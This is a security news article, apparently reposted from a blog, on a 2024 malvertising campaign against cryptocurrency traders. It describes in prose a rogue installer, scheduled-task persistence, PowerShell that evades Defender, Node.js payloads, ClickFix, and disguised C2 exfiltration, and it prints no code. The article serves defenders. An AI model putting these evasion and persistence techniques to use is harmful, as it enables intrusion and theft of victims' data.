Malvertising Campaign Leveraging Nodejs Targets Cryptocurrency Traders: A New Threat to Be Aware Of

In October 2024, Microsoft uncovered a sophisticated malvertising campaign that uses Node.js to execute malicious payloads aimed at stealing sensitive data. This campaign targets unsuspecting users through cryptocurrency-related lures and fraudulent websites that impersonate legitimate trading platforms like Binance and TradingView. As the attack progresses, the threat actors utilize various methods, including obfuscated PowerShell commands and advanced persistence mechanisms, to gather critical system information and exfiltrate valuable data. Here’s an in-depth look at this ongoing threat, its techniques, and how it unfolds.

The campaign relies on fraudulent cryptocurrency trading platforms to attract potential victims. Once a user visits these fake sites, they are tricked into downloading a rogue installer that masquerades as legitimate software. This installer contains a Dynamic-Link Library (DLL) called “CustomActions.dll,” which is responsible for performing various malicious activities on the infected system. One of the first actions the DLL takes is to collect basic system information using Windows Management Instrumentation (WMI), which helps the attackers understand the target environment better. Additionally, the DLL ensures persistence on the host by creating a scheduled task that will allow the attacker to regain control over the system even if the victim restarts their device.

To further deceive the victim, the DLL launches a browser window using “msedge_proxy.exe,” which presents the legitimate cryptocurrency trading website to the user, masking the malicious activity occurring in the background. This technique ensures that the victim remains unaware of the attack while the payload continues to operate.

Behind the scenes, the scheduled task is configured to run PowerShell commands, which are responsible for downloading additional malicious scripts from a remote server. These scripts take steps to evade detection by Microsoft Defender for Endpoint by excluding the running PowerShell process and the current directory from scans. Once these exclusions are in place, obfuscated PowerShell commands are executed to retrieve more scripts designed to harvest detailed system data, such as information about the operating system, BIOS, hardware, and installed applications.

The collected data is converted into JSON format and transmitted to a command-and-control (C2) server using HTTPS POST requests. The attackers then move to the next phase of the attack, where they download an archive from the C2 containing a Node.js runtime binary and a JavaScript compiled (JSC) file. The Node.js binary is executed to run the JSC file, which establishes network connections and attempts to extract sensitive browser information.

In another observed variation of the attack, the “ClickFix” technique is employed to execute inline JavaScript. This method bypasses conventional file-based execution by using PowerShell to directly execute JavaScript code, which is then used to conduct network discovery and collect additional intelligence. The attackers disguise their C2 traffic as legitimate Cloudflare activity, allowing them to evade detection, and make system modifications to gain persistence, such as altering Windows Registry keys.

Microsoft highlights the dual-purpose nature of Node.js in this attack. While Node.js is a widely used open-source environment for building legitimate applications, its flexibility also makes it an attractive tool for attackers looking to blend their malicious activities with legitimate software. By doing so, they can bypass traditional security measures, maintain long-term access to compromised systems, and extract critical data without raising suspicion.

This attack is not an isolated incident. CloudSEK recently reported that a fake PDF-to-DOCX converter site impersonating PDF Candy was also exploiting the ClickFix technique to deploy a different type of malware, SectopRAT, which is notorious for stealing sensitive data. Furthermore, phishing campaigns targeting companies’ employees have also been observed, utilizing human resources-themed scams to gain unauthorized access to payroll systems and divert funds.

What Undercode Say:

The ongoing malvertising campaign, especially one leveraging the Node.js environment, presents a sophisticated and evolving threat. Node.js has long been an essential tool for developers, allowing them to create efficient and scalable applications. Unfortunately, as with many popular technologies, its widespread use also makes it an attractive vector for malicious actors.

The fact that threat actors are blending malicious activity with legitimate software components, like Node.js, highlights the growing challenge for cybersecurity professionals. Traditional security tools, while effective against known threats, are often less adept at detecting attacks that use trusted software environments to mask their activity. This is especially concerning when coupled with techniques like obfuscated PowerShell commands, which are frequently used to sidestep endpoint detection systems.

The campaign also shows the creativity and persistence of modern attackers. By using social engineering techniques, such as the impersonation of cryptocurrency trading platforms, the attackers are targeting individuals who may already be familiar with online trading. This helps increase the likelihood of the victim falling for the scam. Furthermore, the attackers’ ability to disguise their malicious activity as legitimate website traffic using Cloudflare is a reminder of how advanced threat actors can adapt to avoid detection by using established, trusted services.

Additionally, the deployment of persistent mechanisms, such as scheduled tasks and registry modifications, demonstrates a well-organized effort to maintain control over compromised systems for as long as possible. This level of sophistication requires a comprehensive response from both users and security experts. While individuals can take steps to protect themselves by being cautious when downloading software from unfamiliar sources, organizations must be diligent in monitoring their networks for signs of compromise and ensuring their security software is updated to detect and block these advanced threats.

What’s also troubling is the reported trend of phishing campaigns leveraging similar tactics. These attacks don’t just target individuals but also companies, with a specific focus on payroll systems. The ability to steal sensitive financial data by hijacking payroll portals can have devastating consequences for both employees and employers alike. The attackers’ use of sponsored search ads to drive traffic to malicious websites, especially in the context of HR-related scams, illustrates how attackers are evolving to exploit both trust and technological advances to their advantage.

Given the increasing complexity of these attacks, it’s clear that cybersecurity needs to be proactive, adaptive, and multifaceted. Users must remain vigilant, and organizations need to employ advanced detection methods to identify potential threats early. Furthermore, the use of technologies like Node.js should be carefully monitored, as they can be exploited in ways that are not immediately apparent to traditional security measures.

Fact Checker Results:

Node.js Vulnerability: The use of Node.js in malware campaigns is a confirmed tactic, as Node.js is a popular and trusted tool for both legitimate and malicious purposes.
ClickFix and Inline JavaScript: The ClickFix technique, as well as the use of inline JavaScript to evade detection, has been verified as a method utilized by attackers in various campaigns.
Phishing Attacks and Payroll Scams: The reported phishing scams targeting payroll systems and their connection to hacking groups like “Payroll Pirates” has been substantiated through multiple security reports.